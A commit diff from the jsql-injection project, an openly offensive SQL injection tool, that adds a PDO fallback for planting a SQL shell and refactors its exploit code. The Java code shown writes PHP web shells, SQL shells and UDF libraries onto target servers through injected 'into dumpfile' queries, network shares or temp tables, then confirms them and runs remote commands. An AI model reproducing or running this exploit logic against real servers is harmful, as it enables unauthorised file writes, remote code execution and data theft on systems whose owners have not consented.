Add exploit with PHP PDO

- Restore build jdk11
- Fix sonar issues

Author: ron190

.github/workflows/build-jdk11.yml

@@ -10,7 +10,7 @@ jobs:
     name: Test view on Docker
     runs-on: ubuntu-latest
     env:
-      JSQL_DOCKERFILE: 3.6.2-jdk-12
+      JSQL_DOCKERFILE: 3.8.1-jdk-11-slim
       MAVEN_NASHORN: -Dnashorn.args=--no-deprecation-warning
       MAVEN_BYTEBUDDY: ""
       DOCKER_RESOURCES: ${{ inputs.DOCKER_RESOURCES }}

README.md

@@ -20,6 +20,8 @@ Read about jSQL [features](https://github.com/ron190/jsql-injection/wiki/Feature
 
 For programmers, access the generated [Maven reports](https://ron190.github.io/jsql-injection/site/) and [Sonar analysis](https://sonarcloud.io/dashboard?id=ron190%3Ajsql-injection) to analyze internal metrics, and open the [programming section](https://github.com/ron190/jsql-injection/wiki/Programming-jSQL) in the wiki for more details.
 
+To implement new modules, refer to the [API documentation](https://ron190.github.io/jsql-injection/site/xref/index.html)
+
 ## Install
 First, install :coffee: [Java](http://java.com) 11 or up to version 23, then download the latest jSQL [release](https://github.com/ron190/jsql-injection/releases/) and double-click on the file `jsql-injection-v0.103.jar` to run the software.
 

model/src/main/java/com/jsql/model/accessible/ResourceAccess.java

@@ -26,7 +26,10 @@
 import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;
 
-import java.io.*;
+import java.io.File;
+import java.io.FileInputStream;
+import java.io.IOException;
+import java.io.InputStream;
 import java.net.URI;
 import java.net.URLEncoder;
 import java.net.http.HttpHeaders;
@@ -40,9 +43,12 @@
 import java.nio.file.Paths;
 import java.time.Duration;
 import java.util.*;
-import java.util.concurrent.*;
-import java.util.function.BiConsumer;
+import java.util.concurrent.CompletionService;
+import java.util.concurrent.ExecutionException;
+import java.util.concurrent.ExecutorCompletionService;
+import java.util.concurrent.ExecutorService;
 import java.util.function.BiFunction;
+import java.util.function.BiPredicate;
 import java.util.regex.Pattern;
 
 /**
@@ -179,45 +185,61 @@ public void logSearchAdminPage(int nbAdminPagesFound, int submittedTasks, int ta
     }
 
     public String createExploitWeb(String pathExploit, String urlExploit, String pathNetshare, ExploitMethod exploitMethod) throws JSqlException {
-        BiConsumer<String, String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
+        BiFunction<String, String, String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
             var request = new Request();
             request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
             request.setParameters(urlSuccess);
             this.injectionModel.sendToViews(request);
+            return urlSuccess;
         };
         return this.createExploit(pathExploit, urlExploit, "exploit.web", "web.php", biFuncGetRequest, pathNetshare, exploitMethod);
     }
 
     public void createExploitUpload(String pathExploit, String urlExploit, String pathNetshare, ExploitMethod exploitMethod, File fileToUpload) throws JSqlException {
-        BiConsumer<String, String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
+        BiFunction<String, String, String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
             try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
                 HttpResponse<String> result = this.upload(fileToUpload, urlSuccess, streamToUpload);
                 if (result.body().contains(DataAccess.LEAD + "y")) {
                     LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "Upload successful: ack received for {}{}", pathExploit, fileToUpload.getName());
                 } else {
                     LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Upload failure: missing ack for {}{}", pathExploit, fileToUpload.getName());
                 }
-            } catch (IOException | JSqlException | InterruptedException e) {
+            } catch (InterruptedException e) {
+                LOGGER.log(LogLevelUtil.IGNORE, e, e);
+                Thread.currentThread().interrupt();
+            } catch (IOException | JSqlException e) {
                 throw new JSqlRuntimeException(e);
             }
+            return urlSuccess;
         };
         this.createExploit(pathExploit, urlExploit, "exploit.upl", "upl.php", biFuncGetRequest, pathNetshare, exploitMethod);
     }
 
     public String createExploitSql(String pathExploit, String urlExploit, String pathNetshare, ExploitMethod exploitMethod, String username, String password) throws JSqlException {
-        BiConsumer<String, String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
-            var request = new Request();
-            request.setMessage(Interaction.ADD_TAB_EXPLOIT_SQL);
-            request.setParameters(urlSuccess, username, password);
-            this.injectionModel.sendToViews(request);
+        BiFunction<String, String, String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
+            var resultQuery = this.runSqlShell("select 1337", null, urlSuccess, username, password, false);
+            if (resultQuery != null && resultQuery.contains("| 1337 |")) {
+                var request = new Request();
+                request.setMessage(Interaction.ADD_TAB_EXPLOIT_SQL);
+                request.setParameters(urlSuccess, username, password);
+                this.injectionModel.sendToViews(request);
+                return urlSuccess;
+            }
+            return StringUtils.EMPTY;
         };
-        // todo PDO
-        var nameExploitValidated = this.createExploit(pathExploit, urlExploit, "exploit.sql.php7", "sql.php", biFuncGetRequest, pathNetshare, exploitMethod);
-        if (StringUtils.isEmpty(nameExploitValidated)) {
-            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit failure with php7, retrying with lower version...");
-            nameExploitValidated = this.createExploit(pathExploit, urlExploit, "exploit.sql", "sql.php", biFuncGetRequest, pathNetshare, exploitMethod);
+        var urlSuccess = this.createExploit(pathExploit, urlExploit, "exploit.sql.mysqli", "sql.php", biFuncGetRequest, pathNetshare, exploitMethod);
+        if (StringUtils.isEmpty(urlSuccess)) {
+            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Failure with mysqli_query(), trying with pdo()...");
+            urlSuccess = this.createExploit(pathExploit, urlExploit, "exploit.sql.pdo", "sql.php", biFuncGetRequest, pathNetshare, exploitMethod);
+        }
+        if (StringUtils.isEmpty(urlSuccess)) {
+            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Failure with pdo(), trying with mysql_query()...");
+            urlSuccess = this.createExploit(pathExploit, urlExploit, "exploit.sql.mysql", "sql.php", biFuncGetRequest, pathNetshare, exploitMethod);
         }
-        return nameExploitValidated;
+        if (StringUtils.isEmpty(urlSuccess)) {
+            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Failure with pdo(), trying with mysql_query()...");
+        }
+        return urlSuccess;
     }
 
     /**
@@ -229,7 +251,7 @@ public String createExploit(
         String urlExploit,
         String keyPropertyExploit,
         String nameExploit,
-        BiConsumer<String, String> biFuncGetRequest,
+        BiFunction<String, String, String> biFuncGetRequest,
         String pathNetshareFolder,
         ExploitMethod exploitMethod
     ) throws JSqlException {
@@ -244,7 +266,7 @@ public String createExploit(
         .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
 
         // outfile + binary: content corruption
-        BiFunction<String, String, Boolean> funcConfirm = (String pathFolder, String nameFile) -> {
+        BiPredicate<String, String> biPredConfirm = (String pathFolder, String nameFile) -> {
             try {
                 String resultInjection = this.confirmExploit(pathFolder + nameFile);
                 return resultInjection.contains(bodyExploit);
@@ -263,15 +285,15 @@ public String createExploit(
                 pathNetshareFolder,
                 nameExploit,
                 pathRemoteFolder,
-                funcConfirm
+                biPredConfirm
             );
         } else if (exploitMethod == ExploitMethod.AUTO || exploitMethod == ExploitMethod.QUERY_BODY) {
             nameExploitValidated = this.injectionModel.getUdfAccess().byQueryBody(
                 nbIndexesFound,
                 pathRemoteFolder,
                 nameExploit,
                 UdfAccess.toHexChunks(bodyExploit.getBytes()),
-                funcConfirm
+                biPredConfirm
             );
         }
         if (StringUtils.isEmpty(nameExploitValidated) && exploitMethod == ExploitMethod.AUTO || exploitMethod == ExploitMethod.TEMP_TABLE) {
@@ -280,23 +302,22 @@ public String createExploit(
                 UdfAccess.toHexChunks(bodyExploit.getBytes()),
                 pathRemoteFolder + nameExploitRandom
             );
-            if (funcConfirm.apply(pathRemoteFolder, nameExploitRandom)) {
+            if (biPredConfirm.test(pathRemoteFolder, nameExploitRandom)) {
                 nameExploitValidated = nameExploitRandom;
             }
         }
 
         if (StringUtils.isEmpty(nameExploitValidated)) {
-            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit creation failure: source file not found at [{}]", pathRemoteFolder + nameExploitValidated);
+            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit creation failure: source file not found at [{}{}]", pathRemoteFolder, nameExploitValidated);
             return null;
         }
         nameExploit = nameExploitValidated;
-        LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "Exploit creation successful: source file found at [{}]", pathRemoteFolder + nameExploitValidated);
+        LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "Exploit creation successful: source file found at [{}{}]", pathRemoteFolder, nameExploitValidated);
 
-        this.checkUrls(urlExploit, nameExploit, biFuncGetRequest);
-        return nameExploitValidated;
+        return this.checkUrls(urlExploit, nameExploit, biFuncGetRequest);
     }
 
-    private void checkUrls(String urlExploit, String nameExploit, BiConsumer<String, String> biFuncGetRequest) {
+    private String checkUrls(String urlExploit, String nameExploit, BiFunction<String, String, String> biFuncGetRequest) {
         String urlExploitFixed = urlExploit;
         if (!urlExploitFixed.isEmpty()) {
             urlExploitFixed = urlExploitFixed.replaceAll("/*$", StringUtils.EMPTY) +"/";
@@ -323,10 +344,11 @@ private void checkUrls(String urlExploit, String nameExploit, BiConsumer<String,
         }
         String urlSuccess = this.getExploitUrl(nameExploit, directoryNames, urlProtocol);
         if (urlSuccess != null) {
-            biFuncGetRequest.accept(nameExploit, urlSuccess);
+            urlSuccess = biFuncGetRequest.apply(nameExploit, urlSuccess);
         } else {
             LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit access failure: URL not found");
         }
+        return urlSuccess;
     }
 
     private static void copyToShare(String pathFile, String bodyExploit) throws JSqlException {
@@ -443,6 +465,10 @@ public String runWebShell(String command, UUID uuidShell, String urlExploit) {
      * @param password password [optional]
      */
     public String runSqlShell(String command, UUID uuidShell, String urlExploit, String username, String password) {
+        return this.runSqlShell(command, uuidShell, urlExploit, username, password, true);
+    }
+
+    public String runSqlShell(String command, UUID uuidShell, String urlExploit, String username, String password, boolean isWithView) {
         String result = this.runCommandShell(String.format(
              "%s?q=%s&u=%s&p=%s",
              urlExploit,
@@ -465,10 +491,12 @@ public String runSqlShell(String command, UUID uuidShell, String urlExploit, Str
             result = result.replace("<SQLe>", StringUtils.EMPTY) + "\n";
         }
 
-        var request = new Request();  // Unfroze interface
-        request.setMessage(Interaction.GET_EXPLOIT_SQL_RESULT);
-        request.setParameters(uuidShell, result, command);
-        this.injectionModel.sendToViews(request);
+        if (isWithView) {
+            var request = new Request();  // Unfroze interface
+            request.setMessage(Interaction.GET_EXPLOIT_SQL_RESULT);
+            request.setParameters(uuidShell, result, command);
+            this.injectionModel.sendToViews(request);
+        }
         return result;
     }
 

model/src/main/java/com/jsql/model/accessible/UdfAccess.java

@@ -22,8 +22,11 @@
 import java.nio.file.Path;
 import java.nio.file.Paths;
 import java.nio.file.StandardCopyOption;
-import java.util.*;
-import java.util.function.BiFunction;
+import java.util.ArrayList;
+import java.util.List;
+import java.util.Objects;
+import java.util.UUID;
+import java.util.function.BiPredicate;
 
 public class UdfAccess {
 
@@ -34,7 +37,7 @@ public class UdfAccess {
     private static final String NAME_TABLE = "temp";
 
     private final InjectionModel injectionModel;
-    private final BiFunction<String, String, Boolean> funcConfirm = (String pathRemoteFolder, String nameLibraryRandom) -> {
+    private final BiPredicate<String, String> biPredConfirm = (String pathRemoteFolder, String nameLibraryRandom) -> {
         try {
             return this.buildSysEval(nameLibraryRandom);
         } catch (JSqlException e) {
@@ -62,13 +65,17 @@ public void createUdf(String pathNetshareFolder, ExploitMethod exploitMethod) th
             throw new JSqlException("Incorrect remote machine: unknown system");
         }
         var isWin = versionOsMachine.toLowerCase().contains("win") && !versionOsMachine.toLowerCase().contains("linux");
-        var nameLibrary = versionOsMachine.contains("64")
-        ? isWin ? "64.dll" : "64.so"
-        : isWin ? "32.dll" : "32.so";
+
+        String nameLibrary;
+        if (versionOsMachine.contains("64")) {
+            nameLibrary = isWin ? "64.dll" : "64.so";
+        } else {
+            nameLibrary = isWin ? "32.dll" : "32.so";
+        }
 
         pathPlugin = pathPlugin.replace("\\", "/");
         if (!pathPlugin.endsWith("/")) {
-            pathPlugin = pathPlugin + "/";
+            pathPlugin = String.format("%s%s", pathPlugin, "/");
         }
 
         if (!this.injectionModel.getMediatorStrategy().getStack().isApplicable()) {
@@ -85,7 +92,7 @@ public void createUdf(String pathNetshareFolder, ExploitMethod exploitMethod) th
                 pathNetshareFolder,
                 nameLibrary,
                 pathPlugin,
-                this.funcConfirm
+                this.biPredConfirm
             );
         } else if (exploitMethod == ExploitMethod.AUTO || exploitMethod == ExploitMethod.QUERY_BODY) {
             if (StringUtil.GET.equals(this.injectionModel.getMediatorUtils().getConnectionUtil().getTypeRequest())) {
@@ -96,13 +103,13 @@ public void createUdf(String pathNetshareFolder, ExploitMethod exploitMethod) th
                 pathPlugin,
                 nameLibrary,
                 UdfAccess.toHexChunks(nameLibrary),
-                this.funcConfirm
+                this.biPredConfirm
             );
         }
         if (StringUtils.isEmpty(isSuccess) && exploitMethod == ExploitMethod.AUTO || exploitMethod == ExploitMethod.TEMP_TABLE) {
             var nameLibraryRandom = RandomStringUtils.insecure().nextAlphabetic(8) +"-"+ nameLibrary;
             this.byTable(UdfAccess.toHexChunks(nameLibrary), pathPlugin + nameLibraryRandom);
-            this.funcConfirm.apply(pathPlugin, nameLibraryRandom);
+            this.biPredConfirm.test(pathPlugin, nameLibraryRandom);
         }
     }
 
@@ -111,32 +118,31 @@ public String byQueryBody(
         String pathRemoteFolder,
         String nameExploit,
         List<String> hexChunks,
-        BiFunction<String,String, Boolean> funcConfirm
+        BiPredicate<String,String> biPredConfirm
     ) {
         String nameExploitValidated = StringUtils.EMPTY;
         var pattern = " %s SELECT %s 0x%s into dumpfile '%s'";
 
-        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Checking connection using query body and union...");
         var nameExploitRandom = RandomStringUtils.insecure().nextAlphabetic(8) +"-"+ nameExploit;
         this.injectionModel.injectWithoutIndex(String.format(pattern,
             "union",
             "'',".repeat(nbIndexesFound),
             String.join("", hexChunks),
             pathRemoteFolder + nameExploitRandom
         ), "body#union-dump");
-        if (funcConfirm.apply(pathRemoteFolder, nameExploitRandom)) {
+        if (biPredConfirm.test(pathRemoteFolder, nameExploitRandom)) {
             nameExploitValidated = nameExploitRandom;
         }
         if (StringUtils.isEmpty(nameExploitValidated)) {
-            LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Checking connection using query body and stack...");
+            LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Query body connection failure with union, trying with stack...");
             nameExploitRandom = RandomStringUtils.insecure().nextAlphabetic(8) +"-"+ nameExploit;
             this.injectionModel.injectWithoutIndex(String.format(pattern,
                 ";",
                 StringUtils.EMPTY,
                 String.join("", hexChunks),
                 pathRemoteFolder + nameExploitRandom
             ), "body#stack-dump");
-            if (funcConfirm.apply(pathRemoteFolder, nameExploitRandom)) {
+            if (biPredConfirm.test(pathRemoteFolder, nameExploitRandom)) {
                 nameExploitValidated = nameExploitRandom;
             }
         }
@@ -148,7 +154,7 @@ public String byNetshare(
         String pathNetshareFolder,
         String nameExploit,
         String pathRemoteFolder,
-        BiFunction<String,String, Boolean> funcConfirm
+        BiPredicate<String,String> biPredConfirm
     ) {
         String nameExploitValidated = StringUtils.EMPTY;
         var pathShareEncoded = pathNetshareFolder.replace("\\", "\\\\");
@@ -162,7 +168,7 @@ public String byNetshare(
             pathShareEncoded + nameExploit,
             pathRemoteFolder + nameExploitRandom
         ), "udf#share-union");
-        if (funcConfirm.apply(pathRemoteFolder, nameExploitRandom)) {
+        if (biPredConfirm.test(pathRemoteFolder, nameExploitRandom)) {
             nameExploitValidated = nameExploitRandom;
         }
         if (StringUtils.isEmpty(nameExploitValidated)) {
@@ -174,7 +180,7 @@ public String byNetshare(
                 pathShareEncoded + nameExploit,
                 pathRemoteFolder + nameExploitRandom
             ), "udf#share-stack");
-            if (funcConfirm.apply(pathRemoteFolder, nameExploitRandom)) {
+            if (biPredConfirm.test(pathRemoteFolder, nameExploitRandom)) {
                 nameExploitValidated = nameExploitRandom;
             }
         }

model/src/main/java/com/jsql/util/CookiesUtil.java

@@ -29,7 +29,7 @@ public boolean testParameters(boolean hasFoundInjection) {
             if (!this.injectionModel.getMediatorUtils().getPreferencesUtil().isCheckingAllCookieParam()) {
                 return false;
             }
-            LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, I18nUtil.valueByKey("LOG_CHECKING") +" cookies...");
+            LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "{} cookies...", I18nUtil.valueByKey("LOG_CHECKING"));
         } else {
             return true;
         }

model/src/main/java/com/jsql/util/MultipartUtil.java

@@ -24,7 +24,7 @@ public MultipartUtil(InjectionModel injectionModel) {
 
     public boolean testParameters(boolean hasFoundInjection) {
         if (!hasFoundInjection) {
-            LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, I18nUtil.valueByKey("LOG_CHECKING") +"Checking multipart...");
+            LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "{} multipart...", I18nUtil.valueByKey("LOG_CHECKING"));
         } else {
             return true;
         }